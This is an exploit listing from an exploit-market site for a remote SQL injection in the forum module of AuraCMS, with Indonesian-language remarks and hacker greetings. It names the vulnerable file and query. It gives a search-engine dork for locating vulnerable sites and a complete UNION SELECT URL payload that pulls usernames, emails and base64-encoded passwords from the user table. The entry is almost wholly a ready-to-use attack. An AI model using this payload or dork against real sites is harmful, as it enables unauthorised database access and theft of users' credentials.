[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

AuraCMS [Forum Module] Remote SQL Injection Vulnerability

Author
k1tk4t
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2058
Category
web applications
Date add
04-08-2007
Platform
unsorted
=========================================================
AuraCMS [Forum Module] Remote SQL Injection Vulnerability
=========================================================



########################################################################
# AuraCMS [Forum Module] - Remote SQL Injection
# Vendor        : http://auracms.org/
# Dork          : inurl:"?pilih=forum"
########################################################################
file;
/forum/komentar.php

bug at line27-29;
select topikid, subjek, pengirim,reply, waktu, isi from ".$prefix."forum_topik where topikid=$id");

Variable $id tidak terfilter dengan baik sehingga bisa di manipulasi oleh user melalui browser
########################################################################

exploit;
http://localhost/AuraCMS/?pilih=forum&mod=yes&aksi=komentar&id=-9%20union%20select%201,user,id,4,email,password%20from%20user/*

Password dalam bentuk "base64_encode"

########################################################################
Thanks;
str0ke
xoron,
y3dips[y3d1ps.blogspot.com],
mathdule
iFX,x-ace,nyubi,
dan semua temen2 komunitas security&hacking
mR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX
-----------------------
semua komunitas hacker&security Indonesia



#  0day.today [2024-12-25]  #